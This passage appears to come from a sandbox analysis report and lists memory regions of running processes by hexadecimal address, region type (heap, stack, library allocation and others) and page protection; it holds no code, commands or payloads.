|
page read and write
|
||
|
7FF5EDA0B000
|
unkown
|
page readonly
|
||
|
1DC583E0000
|
heap
|
page read and write
|
||
|
C0304F5000
|
stack
|
page read and write
|
||
|
7FF5ED915000
|
unkown
|
page readonly
|
||
|
7FF5ED793000
|
unkown
|
page readonly
|
||
|
7FFD9B7A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2FE5000
|
heap
|
page read and write
|
||
|
7FF5ED471000
|
unkown
|
page readonly
|
||
|
7FF5ED76D000
|
unkown
|
page readonly
|
||
|
8108000
|
stack
|
page read and write
|
||
|
C7C5000
|
unkown
|
page read and write
|
||
|
8710000
|
unkown
|
page readonly
|
||
|
37F6000
|
unkown
|
page read and write
|
||
|
784A000
|
unkown
|
page read and write
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
1DC580ED000
|
heap
|
page read and write
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
1D6672C6000
|
heap
|
page read and write
|
||
|
36F0000
|
unkown
|
page readonly
|
||
|
7FF5ED68C000
|
unkown
|
page readonly
|
||
|
B08D000
|
stack
|
page read and write
|
||
|
7FFD9B800000
|
trusted library allocation
|
page execute and read and write
|
||
|
2FA0000
|
trusted library allocation
|
page read and write
|
||
|
7FF5ED990000
|
unkown
|
page readonly
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
7FF5ED530000
|
unkown
|
page readonly
|
||
|
1D667696000
|
heap
|
page read and write
|
||
|
B08D000
|
stack
|
page read and write
|
||
|
F524000
|
unkown
|
page read and write
|
||
|
3290000
|
unkown
|
page read and write
|
||
|
7FF5ED279000
|
unkown
|
page readonly
|
||
|
1DC3FFB0000
|
heap
|
page execute and read and write
|
||
|
A19F000
|
stack
|
page read and write
|
||
|
97A9000
|
unkown
|
page read and write
|
||
|
C89C000
|
unkown
|
page read and write
|
||
|
B00E000
|
stack
|
page read and write
|
||
|
7FF5ED1D6000
|
unkown
|
page readonly
|
||
|
A4AE000
|
unkown
|
page read and write
|
||
|
3738000
|
unkown
|
page read and write
|
||
|
7FF5ED810000
|
unkown
|
page readonly
|
||
|
B640000
|
unkown
|
page read and write
|
||
|
7FF5ED793000
|
unkown
|
page readonly
|
||
|
7FF5ED556000
|
unkown
|
page readonly
|
||
|
4C18000
|
unkown
|
page read and write
|
||
|
1490000
|
unkown
|
page read and write
|
||
|
4C34000
|
unkown
|
page read and write
|
||
|
3432000
|
heap
|
page read and write
|
||
|
7FF5ED4E8000
|
unkown
|
page readonly
|
||
|
4E91000
|
trusted library allocation
|
page execute and read and write
|
||
|
4C4B000
|
unkown
|
page read and write
|
||
|
7859000
|
unkown
|
page read and write
|
||
|
7FFD9B940000
|
trusted library allocation
|
page read and write
|
||
|
D3E000
|
stack
|
page read and write
|
||
|
1D666A2E000
|
heap
|
page read and write
|
||
|
4CD0000
|
unkown
|
page read and write
|
||
|
C0308FE000
|
stack
|
page read and write
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
29F0B88E000
|
trusted library allocation
|
page read and write
|
||
|
7C90000
|
unkown
|
page read and write
|
||
|
A50B000
|
unkown
|
page read and write
|
||
|
C24347E000
|
stack
|
page read and write
|
||
|
76A0000
|
unkown
|
page read and write
|
||
|
1451000
|
unkown
|
page readonly
|
||
|
7CC0000
|
unkown
|
page readonly
|
||
|
7FF5ED68F000
|
unkown
|
page readonly
|
||
|
7F2E000
|
stack
|
page read and write
|
||
|
93BE000
|
stack
|
page read and write
|
||
|
7FF5EDA11000
|
unkown
|
page readonly
|
||
|
1DC4057E000
|
trusted library allocation
|
page read and write
|
||
|
C89A000
|
unkown
|
page read and write
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
287A000
|
heap
|
page read and write
|
||
|
89C0000
|
unkown
|
page read and write
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
7FF5ED4BB000
|
unkown
|
page readonly
|
||
|
B190000
|
unkown
|
page read and write
|
||
|
1D66769E000
|
heap
|
page read and write
|
||
|
A39B000
|
unkown
|
page read and write
|
||
|
FC05000
|
unkown
|
page read and write
|
||
|
AADB000
|
unkown
|
page read and write
|
||
|
4CD0000
|
unkown
|
page read and write
|
||
|
67ED000
|
stack
|
page read and write
|
||
|
1D667274000
|
heap
|
page read and write
|
||
|
3791000
|
unkown
|
page read and write
|
||
|
1DC582D7000
|
heap
|
page execute and read and write
|
||
|
16766000
|
system
|
page read and write
|
||
|
7FFD9B880000
|
trusted library allocation
|
page read and write
|
||
|
1D666A24000
|
heap
|
page read and write
|
||
|
7FFD9B980000
|
trusted library allocation
|
page read and write
|
||
|
C0306FE000
|
stack
|
page read and write
|
||
|
7695000
|
stack
|
page read and write
|
||
|
7FF5EDA70000
|
unkown
|
page readonly
|
||
|
9E0000
|
heap
|
page read and write
|
||
|
29F03B00000
|
heap
|
page read and write
|
||
|
A327000
|
unkown
|
page read and write
|
||
|
7FF5ED77E000
|
unkown
|
page readonly
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
1095000
|
stack
|
page read and write
|
||
|
7FF5ED821000
|
unkown
|
page readonly
|
||
|
C6F2000
|
unkown
|
page read and write
|
||
|
1698000
|
direct allocation
|
page execute and read and write
|
||
|
7FF5ED853000
|
unkown
|
page readonly
|
||
|
1D666C70000
|
heap
|
page read and write
|
||
|
7FF5ED853000
|
unkown
|
page readonly
|
||
|
7FF5ED975000
|
unkown
|
page readonly
|
||
|
E51D000
|
stack
|
page read and write
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
7FF5ED990000
|
unkown
|
page readonly
|
||
|
87F0000
|
heap
|
page read and write
|
||
|
7FF5ED71E000
|
unkown
|
page readonly
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
7FF5ED9F2000
|
unkown
|
page readonly
|
||
|
37F9000
|
unkown
|
page read and write
|
||
|
C88B000
|
unkown
|
page read and write
|
||
|
4C60000
|
unkown
|
page read and write
|
||
|
9977000
|
unkown
|
page read and write
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
79D3000
|
unkown
|
page read and write
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
7FF5ED697000
|
unkown
|
page readonly
|
||
|
4FC0000
|
trusted library allocation
|
page read and write
|
||
|
1D664C56000
|
heap
|
page read and write
|
||
|
1DC4052E000
|
trusted library allocation
|
page read and write
|
||
|
BC9B000
|
stack
|
page read and write
|
||
|
B5AE000
|
stack
|
page read and write
|
||
|
1D666A5F000
|
heap
|
page read and write
|
||
|
53B1000
|
direct allocation
|
page execute and read and write
|
||
|
7FF5ED660000
|
unkown
|
page readonly
|
||
|
A494000
|
unkown
|
page read and write
|
||
|
7FF5ED71E000
|
unkown
|
page readonly
|
||
|
7FF5ED9A1000
|
unkown
|
page readonly
|
||
|
7FF5ED64F000
|
unkown
|
page readonly
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
1DC3E0D6000
|
heap
|
page read and write
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
7FF5ED735000
|
unkown
|
page readonly
|
||
|
C243BBF000
|
stack
|
page read and write
|
||
|
7FFD9B891000
|
trusted library allocation
|
page read and write
|
||
|
9879000
|
unkown
|
page read and write
|
||
|
7900000
|
unkown
|
page read and write
|
||
|
97B5000
|
unkown
|
page read and write
|
||
|
1DC50031000
|
trusted library allocation
|
page read and write
|
||
|
BC9B000
|
stack
|
page read and write
|
||
|
29F03B60000
|
trusted library allocation
|
page read and write
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
1D666E60000
|
trusted library allocation
|
page read and write
|
||
|
8BE9000
|
stack
|
page read and write
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
1D664C9E000
|
heap
|
page read and write
|
||
|
7FF5ED818000
|
unkown
|
page readonly
|
||
|
7FF5ED602000
|
unkown
|
page readonly
|
||
|
7FF5ED9D2000
|
unkown
|
page readonly
|
||
|
7FF5ED97A000
|
unkown
|
page readonly
|
||
|
14B0000
|
unkown
|
page readonly
|
||
|
5729000
|
unclassified section
|
page read and write
|
||
|
274E000
|
unkown
|
page read and write
|
||
|
5590000
|
unkown
|
page write copy
|
||
|
7FF5ED534000
|
unkown
|
page readonly
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
1DC3E300000
|
trusted library allocation
|
page read and write
|
||
|
1D66732B000
|
heap
|
page read and write
|
||
|
7FF5ED9FF000
|
unkown
|
page readonly
|
||
|
1D6669F2000
|
heap
|
page read and write
|
||
|
14B0000
|
unkown
|
page readonly
|
||
|
7FF5EDA38000
|
unkown
|
page readonly
|
||
|
37B0000
|
unkown
|
page read and write
|
||
|
4C60000
|
unkown
|
page read and write
|
||
|
7FF5ED265000
|
unkown
|
page readonly
|
||
|
6EB7000
|
heap
|
page read and write
|
||
|
7FF5ED28E000
|
unkown
|
page readonly
|
||
|
7FF5ED9D6000
|
unkown
|
page readonly
|
||
|
CA20000
|
unkown
|
page read and write
|
||
|
29F05400000
|
heap
|
page read and write
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
C6F4000
|
unkown
|
page read and write
|
||
|
C030EFE000
|
stack
|
page read and write
|
||
|
7FF5ED85F000
|
unkown
|
page readonly
|
||
|
7D20000
|
unkown
|
page readonly
|
||
|
2FA0000
|
trusted library allocation
|
page read and write
|
||
|
A4FC000
|
unkown
|
page read and write
|
||
|
B8B0000
|
unkown
|
page read and write
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
CA42000
|
unkown
|
page read and write
|
||
|
1D666A2E000
|
heap
|
page read and write
|
||
|
1D6669DC000
|
heap
|
page read and write
|
||
|
7FF5ED409000
|
unkown
|
page readonly
|
||
|
7FF5EDA38000
|
unkown
|
page readonly
|
||
|
3756000
|
unkown
|
page read and write
|
||
|
3590000
|
unkown
|
page read and write
|
||
|
9B60000
|
unkown
|
page readonly
|
||
|
7FF5ED433000
|
unkown
|
page readonly
|
||
|
7884000
|
unkown
|
page read and write
|
||
|
29F0955E000
|
trusted library allocation
|
page read and write
|
||
|
7FF5ED29C000
|
unkown
|
page readonly
|
||
|
3383000
|
heap
|
page read and write
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
9879000
|
unkown
|
page read and write
|
||
|
1DC406E2000
|
trusted library allocation
|
page read and write
|
||
|
7FF5ED669000
|
unkown
|
page readonly
|
||
|
7FF5ED779000
|
unkown
|
page readonly
|
||
|
1D6672C6000
|
heap
|
page read and write
|
||
|
7FF5EDA31000
|
unkown
|
page readonly
|
||
|
7FFD9B8F0000
|
trusted library allocation
|
page read and write
|
||
|
7FF5ED433000
|
unkown
|
page readonly
|
||
|
7FF5ED92C000
|
unkown
|
page readonly
|
||
|
10D0000
|
heap
|
page read and write
|
||
|
6220000
|
trusted library allocation
|
page read and write
|
||
|
1D664C56000
|
heap
|
page read and write
|
||
|
FBD1000
|
unkown
|
page read and write
|
||
|
7FF5ED97A000
|
unkown
|
page readonly
|
||
|
1490000
|
unkown
|
page read and write
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
1D66755F000
|
heap
|
page read and write
|
||
|
54280FF000
|
stack
|
page read and write
|
||
|
3748000
|
unkown
|
page read and write
|
||
|
7FF5ED4A1000
|
unkown
|
page readonly
|
||
|
8BF0000
|
unkown
|
page readonly
|
||
|
786B000
|
unkown
|
page read and write
|
||
|
97B5000
|
unkown
|
page read and write
|
||
|
1D66730B000
|
heap
|
page read and write
|
||
|
7FF5ED695000
|
unkown
|
page readonly
|
||
|
29F08363000
|
trusted library allocation
|
page read and write
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
1DC3E04F000
|
heap
|
page read and write
|
||
|
C24460E000
|
stack
|
page read and write
|
||
|
88EE000
|
stack
|
page read and write
|
||
|
18A0000
|
unkown
|
page readonly
|
||
|
3369000
|
heap
|
page read and write
|
||
|
7FF5ED975000
|
unkown
|
page readonly
|
||
|
7FF5ED692000
|
unkown
|
page readonly
|
||
|
503E000
|
stack
|
page read and write
|
||
|
69B5000
|
heap
|
page read and write
|
||
|
1D664E80000
|
heap
|
page read and write
|
||
|
B82A000
|
stack
|
page read and write
|
||
|
1D667675000
|
heap
|
page read and write
|
||
|
7FF5ED937000
|
unkown
|
page readonly
|
||
|
1D6672A9000
|
heap
|
page read and write
|
||
|
1DC40453000
|
trusted library allocation
|
page read and write
|
||
|
10C0000
|
unkown
|
page readonly
|
||
|
7FF5ED9A1000
|
unkown
|
page readonly
|
||
|
B22B000
|
stack
|
page read and write
|
||
|
C243C3C000
|
stack
|
page read and write
|
||
|
1D6669ED000
|
heap
|
page read and write
|
||
|
7FF5ED939000
|
unkown
|
page readonly
|
||
|
E3000
|
system
|
page execute and read and write
|
||
|
1DC580E9000
|
heap
|
page read and write
|
||
|
1DC406CE000
|
trusted library allocation
|
page read and write
|
||
|
1D664C49000
|
heap
|
page read and write
|
||
|
C51E000
|
unkown
|
page read and write
|
||
|
190E000
|
unclassified section
|
page execute and read and write
|
||
|
4CE0000
|
unkown
|
page read and write
|
||
|
1D664BB0000
|
heap
|
page read and write
|
||
|
1510000
|
unkown
|
page readonly
|
||
|
98A8000
|
unkown
|
page read and write
|
||
|
1D667337000
|
heap
|
page read and write
|
||
|
3580000
|
unkown
|
page readonly
|
||
|
3590000
|
unkown
|
page read and write
|
||
|
7FF5ED4C6000
|
unkown
|
page readonly
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
3659000
|
stack
|
page read and write
|
||
|
29F05B5F000
|
trusted library allocation
|
page read and write
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
7FF5ED625000
|
unkown
|
page readonly
|
||
|
1D667639000
|
heap
|
page read and write
|
||
|
7FF5ED5C5000
|
unkown
|
page readonly
|
||
|
7FF5EDA2A000
|
unkown
|
page readonly
|
||
|
1D666C75000
|
heap
|
page read and write
|
||
|
7861000
|
unkown
|
page read and write
|
||
|
C5A3000
|
unkown
|
page read and write
|
||
|
A29E000
|
stack
|
page read and write
|
||
|
A4A1000
|
unkown
|
page read and write
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
A37D000
|
unkown
|
page read and write
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
A4AB000
|
unkown
|
page read and write
|
||
|
1D667309000
|
heap
|
page read and write
|
||
|
7DDC000
|
stack
|
page read and write
|
||
|
7FF5ED847000
|
unkown
|
page readonly
|
||
|
784A000
|
unkown
|
page read and write
|
||
|
7FF5ED644000
|
unkown
|
page readonly
|
||
|
A32A000
|
unkown
|
page read and write
|
||
|
2FE5000
|
heap
|
page read and write
|
||
|
7B80000
|
unkown
|
page read and write
|
||
|
1D667461000
|
heap
|
page read and write
|
||
|
A4FC000
|
unkown
|
page read and write
|
||
|
1DC40059000
|
trusted library allocation
|
page read and write
|
||
|
7869000
|
unkown
|
page read and write
|
||
|
C557000
|
unkown
|
page read and write
|
||
|
7FF5ED4F3000
|
unkown
|
page readonly
|
||
|
4FC0000
|
trusted library allocation
|
page read and write
|
||
|
7FF5EDA14000
|
unkown
|
page readonly
|
||
|
8DA0000
|
unkown
|
page read and write
|
||
|
7FF5ED534000
|
unkown
|
page readonly
|
||
|
1D6669D4000
|
heap
|
page read and write
|
||
|
1D667309000
|
heap
|
page read and write
|
||
|
7FF5ED4DF000
|
unkown
|
page readonly
|
||
|
A379000
|
unkown
|
page read and write
|
||
|
1D6669D2000
|
heap
|
page read and write
|
||
|
37F2000
|
unkown
|
page read and write
|
||
|
7FF5ED9A6000
|
unkown
|
page readonly
|
||
|
1D664AB0000
|
heap
|
page read and write
|
||
|
7FF5ED781000
|
unkown
|
page readonly
|
||
|
7FF5ED3F3000
|
unkown
|
page readonly
|
||
|
7FF5ED3DA000
|
unkown
|
page readonly
|
||
|
A3BE000
|
unkown
|
page read and write
|
||
|
7FFD9B8B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
906E000
|
stack
|
page read and write
|
||
|
7FF5ED692000
|
unkown
|
page readonly
|
||
|
7FF5ED928000
|
unkown
|
page readonly
|
||
|
7DF4F3041000
|
unkown
|
page execute read
|
||
|
7FF5ED9C8000
|
unkown
|
page readonly
|
||
|
7FF5ED39B000
|
unkown
|
page readonly
|
||
|
1D6669E3000
|
heap
|
page read and write
|
||
|
1D66730B000
|
heap
|
page read and write
|
||
|
3394000
|
heap
|
page read and write
|
||
|
5641000
|
unkown
|
page read and write
|
||
|
7FF5ED8FF000
|
unkown
|
page readonly
|
||
|
1D667581000
|
heap
|
page read and write
|
||
|
7FF5ED342000
|
unkown
|
page readonly
|
||
|
2875000
|
heap
|
page read and write
|
||
|
37A0000
|
unkown
|
page read and write
|
||
|
987B000
|
unkown
|
page read and write
|
||
|
C6C1000
|
unkown
|
page read and write
|
||
|
23E0000
|
heap
|
page read and write
|
||
|
986B000
|
unkown
|
page read and write
|
||
|
B8AB000
|
stack
|
page read and write
|
||
|
7FF5ED933000
|
unkown
|
page readonly
|
||
|
78A0000
|
unkown
|
page read and write
|
||
|
7FF5ED3DA000
|
unkown
|
page readonly
|
||
|
7FF5ED750000
|
unkown
|
page readonly
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
32D8000
|
heap
|
page read and write
|
||
|
1D664C9E000
|
heap
|
page read and write
|
||
|
B6A0000
|
heap
|
page read and write
|
||
|
1D664CB5000
|
heap
|
page read and write
|
||
|
C030CFB000
|
stack
|
page read and write
|
||
|
29F05380000
|
heap
|
page execute and read and write
|
||
|
1DC4056D000
|
trusted library allocation
|
page read and write
|
||
|
10D59000
|
system
|
page read and write
|
||
|
37D2000
|
unkown
|
page read and write
|
||
|
7FF5ED418000
|
unkown
|
page readonly
|
||
|
143B000
|
stack
|
page read and write
|
||
|
C503000
|
unkown
|
page read and write
|
||
|
7FF5EDA70000
|
unkown
|
page readonly
|
||
|
1DC3E270000
|
heap
|
page read and write
|
||
|
785B000
|
unkown
|
page read and write
|
||
|
32F2000
|
heap
|
page read and write
|
||
|
18A1000
|
unkown
|
page readonly
|
||
|
76A0000
|
unkown
|
page read and write
|
||
|
8D69000
|
stack
|
page read and write
|
||
|
7FFD9B89A000
|
trusted library allocation
|
page read and write
|
||
|
29F05320000
|
heap
|
page readonly
|
||
|
1D666A5F000
|
heap
|
page read and write
|
||
|
79B1000
|
unkown
|
page read and write
|
||
|
32F6000
|
heap
|
page read and write
|
||
|
7FF5ED41C000
|
unkown
|
page readonly
|
||
|
1DC4002C000
|
trusted library allocation
|
page read and write
|
||
|
7DF4F3030000
|
unkown
|
page readonly
|
||
|
5557000
|
stack
|
page read and write
|
||
|
7FF5ED445000
|
unkown
|
page readonly
|
||
|
BDA0000
|
unkown
|
page readonly
|
||
|
977A000
|
unkown
|
page read and write
|
||
|
1350000
|
unkown
|
page readonly
|
||
|
CB1D000
|
unkown
|
page read and write
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
AAD1000
|
unkown
|
page read and write
|
||
|
3220000
|
unkown
|
page readonly
|
||
|
7FF5ED814000
|
unkown
|
page readonly
|
||
|
4B50000
|
unkown
|
page read and write
|
||
|
3430000
|
heap
|
page read and write
|
||
|
1D664CDB000
|
heap
|
page read and write
|
||
|
3738000
|
unkown
|
page read and write
|
||
|
7FF5ED915000
|
unkown
|
page readonly
|
||
|
3580000
|
unkown
|
page readonly
|
||
|
C700000
|
unkown
|
page read and write
|
||
|
A479000
|
unkown
|
page read and write
|
||
|
8809000
|
unkown
|
page read and write
|
||
|
2FF0000
|
heap
|
page read and write
|
||
|
337C000
|
heap
|
page read and write
|
||
|
95DB000
|
stack
|
page read and write
|
||
|
9E6C000
|
stack
|
page read and write
|
||
|
3797000
|
unkown
|
page read and write
|
||
|
1DC400F0000
|
trusted library allocation
|
page read and write
|
||
|
7FF5ED939000
|
unkown
|
page readonly
|
||
|
1D667270000
|
heap
|
page read and write
|
||
|
7FF5ED26E000
|
unkown
|
page readonly
|
||
|
4C1E000
|
unkown
|
page read and write
|
||
|
1D666DE0000
|
heap
|
page read and write
|
||
|
A310000
|
unkown
|
page read and write
|
||
|
4F39000
|
heap
|
page read and write
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
29F03B40000
|
trusted library allocation
|
page read and write
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
32F1000
|
heap
|
page read and write
|
||
|
4CB0000
|
unkown
|
page read and write
|
||
|
32F6000
|
heap
|
page read and write
|
||
|
32F1000
|
heap
|
page read and write
|
||
|
1D666A5F000
|
heap
|
page read and write
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
1DC581B6000
|
heap
|
page read and write
|
||
|
1D666A26000
|
heap
|
page read and write
|
||
|
1D667337000
|
heap
|
page read and write
|
||
|
29F0C953000
|
trusted library allocation
|
page read and write
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
29F05781000
|
trusted library allocation
|
page read and write
|
||
|
A3D2000
|
unkown
|
page read and write
|
||
|
1D6672A0000
|
heap
|
page read and write
|
||
|
9F1E000
|
stack
|
page read and write
|
||
|
C507000
|
unkown
|
page read and write
|
||
|
C512000
|
unkown
|
page read and write
|
||
|
7FF5EDA2A000
|
unkown
|
page readonly
|
||
|
1D666A5F000
|
heap
|
page read and write
|
||
|
11B0000
|
unkown
|
page readonly
|
||
|
C516000
|
unkown
|
page read and write
|
||
|
7FF5ED867000
|
unkown
|
page readonly
|
||
|
C6BF000
|
unkown
|
page read and write
|
||
|
14EE000
|
direct allocation
|
page execute and read and write
|
||
|
8730000
|
unkown
|
page read and write
|
||
|
F424000
|
unkown
|
page read and write
|
||
|
B190000
|
unkown
|
page read and write
|
||
|
7FF5ED8E7000
|
unkown
|
page readonly
|
||
|
7FF5ED404000
|
unkown
|
page readonly
|
||
|
7FF5ED4B4000
|
unkown
|
page readonly
|
||
|
7FF5ED844000
|
unkown
|
page readonly
|
||
|
29F0B52B000
|
trusted library allocation
|
page read and write
|
||
|
3220000
|
unkown
|
page readonly
|
||
|
7DF4F3040000
|
unkown
|
page readonly
|
||
|
1D6672A0000
|
heap
|
page read and write
|
||
|
7FF5EDA47000
|
unkown
|
page readonly
|
||
|
B10D000
|
stack
|
page read and write
|
||
|
AAF2000
|
unkown
|
page read and write
|
||
|
542877B000
|
stack
|
page read and write
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
7FF5ED4FD000
|
unkown
|
page readonly
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
6200000
|
heap
|
page read and write
|
||
|
1D666A24000
|
heap
|
page read and write
|
||
|
BD98000
|
stack
|
page read and write
|
||
|
7FF5ED4F3000
|
unkown
|
page readonly
|
||
|
1D666A24000
|
heap
|
page read and write
|
||
|
4B50000
|
unkown
|
page read and write
|
||
|
C54A000
|
unkown
|
page read and write
|
||
|
7FF5EDA31000
|
unkown
|
page readonly
|
||
|
7FF5ED7CF000
|
unkown
|
page readonly
|
||
|
B10D000
|
stack
|
page read and write
|
||
|
7FF5ED46A000
|
unkown
|
page readonly
|
||
|
1D664CA3000
|
heap
|
page read and write
|
||
|
4B78000
|
unkown
|
page read and write
|
||
|
7FF5ED810000
|
unkown
|
page readonly
|
||
|
7FF5ED1B6000
|
unkown
|
page readonly
|
||
|
7FF5ED451000
|
unkown
|
page readonly
|
||
|
7FF5ED8B4000
|
unkown
|
page readonly
|
||
|
4BA6000
|
unkown
|
page read and write
|
||
|
FBDD000
|
unkown
|
page read and write
|
||
|
1350000
|
direct allocation
|
page execute and read and write
|
||
|
5436000
|
unclassified section
|
page read and write
|
||
|
7DF4F3071000
|
unkown
|
page execute read
|
||
|
1D66733E000
|
heap
|
page read and write
|
||
|
7FF5ED7CF000
|
unkown
|
page readonly
|
||
|
7FF5ED961000
|
unkown
|
page readonly
|
||
|
32F6000
|
heap
|
page read and write
|
||
|
29F039A0000
|
heap
|
page read and write
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
1D664CB5000
|
heap
|
page read and write
|
||
|
7FF5ED94A000
|
unkown
|
page readonly
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
1D667309000
|
heap
|
page read and write
|
||
|
29F0B4E6000
|
trusted library allocation
|
page read and write
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
785D000
|
unkown
|
page read and write
|
||
|
AF8D000
|
stack
|
page read and write
|
||
|
1301000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF5ED530000
|
unkown
|
page readonly
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
1D6672A7000
|
heap
|
page read and write
|
||
|
1D6676A1000
|
heap
|
page read and write
|
||
|
9660000
|
unkown
|
page read and write
|
||
|
C5AA000
|
unkown
|
page read and write
|
||
|
7FF5ED2A9000
|
unkown
|
page readonly
|
||
|
7FF5ED735000
|
unkown
|
page readonly
|
||
|
54283FE000
|
stack
|
page read and write
|
||
|
FBA0000
|
unkown
|
page read and write
|
||
|
1DC3E2D0000
|
trusted library allocation
|
page read and write
|
||
|
7DF4F3061000
|
unkown
|
page execute read
|
||
|
C6F8000
|
unkown
|
page read and write
|
||
|
C243ABF000
|
stack
|
page read and write
|
||
|
A391000
|
unkown
|
page read and write
|
||
|
C0310FB000
|
stack
|
page read and write
|
||
|
A4A1000
|
unkown
|
page read and write
|
||
|
7FF5ED33F000
|
unkown
|
page readonly
|
||
|
C10A000
|
stack
|
page read and write
|
||
|
8710000
|
unkown
|
page readonly
|
||
|
1D664CDB000
|
heap
|
page read and write
|
||
|
239B000
|
stack
|
page read and write
|
||
|
A09B000
|
stack
|
page read and write
|
||
|
35A0000
|
unkown
|
page readonly
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
FBEC000
|
unkown
|
page read and write
|
||
|
1DC40432000
|
trusted library allocation
|
page read and write
|
||
|
AB47000
|
unkown
|
page read and write
|
||
|
7FF5ED86B000
|
unkown
|
page readonly
|
||
|
4B90000
|
unkown
|
page read and write
|
||
|
1D667470000
|
heap
|
page read and write
|
||
|
9877000
|
unkown
|
page read and write
|
||
|
1D66754C000
|
heap
|
page read and write
|
||
|
290D684F000
|
system
|
page execute and read and write
|
||
|
7FF5ED93E000
|
unkown
|
page readonly
|
||
|
7FF5ED295000
|
unkown
|
page readonly
|
||
|
7C80000
|
unkown
|
page read and write
|
||
|
7D20000
|
unkown
|
page readonly
|
||
|
7FF5ED91A000
|
unkown
|
page readonly
|
||
|
7FF5ED48A000
|
unkown
|
page readonly
|
||
|
8DA0000
|
unkown
|
page read and write
|
||
|
3379000
|
heap
|
page read and write
|
||
|
7FF5EDA08000
|
unkown
|
page readonly
|
||
|
7FF5ED674000
|
unkown
|
page readonly
|
||
|
B429000
|
system
|
page execute and read and write
|
||
|
87BE000
|
stack
|
page read and write
|
||
|
A4B8000
|
unkown
|
page read and write
|
||
|
4C1E000
|
unkown
|
page read and write
|
||
|
7FF5ED9A6000
|
unkown
|
page readonly
|
||
|
8720000
|
unkown
|
page readonly
|
||
|
EF8000
|
heap
|
page read and write
|
||
|
7FF5ED5A8000
|
unkown
|
page readonly
|
||
|
9869000
|
unkown
|
page read and write
|
||
|
1D6672D2000
|
heap
|
page read and write
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
29F03A03000
|
heap
|
page read and write
|
||
|
A50B000
|
unkown
|
page read and write
|
||
|
7FF5ED882000
|
unkown
|
page readonly
|
||
|
29F0BB8A000
|
trusted library allocation
|
page read and write
|
||
|
1D664CB3000
|
heap
|
page read and write
|
||
|
1D667679000
|
heap
|
page read and write
|
||
|
7FF5ED409000
|
unkown
|
page readonly
|
||
|
1DC5813A000
|
heap
|
page read and write
|
||
|
7FF5EDA53000
|
unkown
|
page readonly
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
1D667661000
|
heap
|
page read and write
|
||
|
97C3000
|
unkown
|
page read and write
|
||
|
1D66752A000
|
heap
|
page read and write
|
||
|
7FFD9BA00000
|
trusted library allocation
|
page read and write
|
||
|
8CEF000
|
stack
|
page read and write
|
||
|
7DF4F3050000
|
unkown
|
page readonly
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
1D66732C000
|
heap
|
page read and write
|
||
|
C89A000
|
unkown
|
page read and write
|
||
|
7FF5ED3A7000
|
unkown
|
page readonly
|
||
|
32FC000
|
heap
|
page read and write
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
1D666A2E000
|
heap
|
page read and write
|
||
|
1D664E8B000
|
heap
|
page read and write
|
||
|
3383000
|
heap
|
page read and write
|
||
|
1D667326000
|
heap
|
page read and write
|
||
|
2A20000
|
heap
|
page read and write
|
||
|
A375000
|
unkown
|
page read and write
|
||
|
7FF5EDA0D000
|
unkown
|
page readonly
|
||
|
29F0D357000
|
trusted library allocation
|
page read and write
|
||
|
5B1F000
|
unclassified section
|
page read and write
|
||
|
7FF5ED942000
|
unkown
|
page readonly
|
||
|
7FF5ED9F2000
|
unkown
|
page readonly
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
A37B000
|
unkown
|
page read and write
|
||
|
4FC0000
|
trusted library allocation
|
page read and write
|
||
|
AB6B000
|
unkown
|
page read and write
|
||
|
7FF5ED9E1000
|
unkown
|
page readonly
|
||
|
7FF5ED806000
|
unkown
|
page readonly
|
||
|
8BF0000
|
unkown
|
page readonly
|
||
|
8860000
|
unkown
|
page read and write
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
CA7C000
|
unkown
|
page read and write
|
||
|
A391000
|
unkown
|
page read and write
|
||
|
6220000
|
heap
|
page read and write
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
1DC3E2B0000
|
trusted library allocation
|
page read and write
|
||
|
8208000
|
stack
|
page read and write
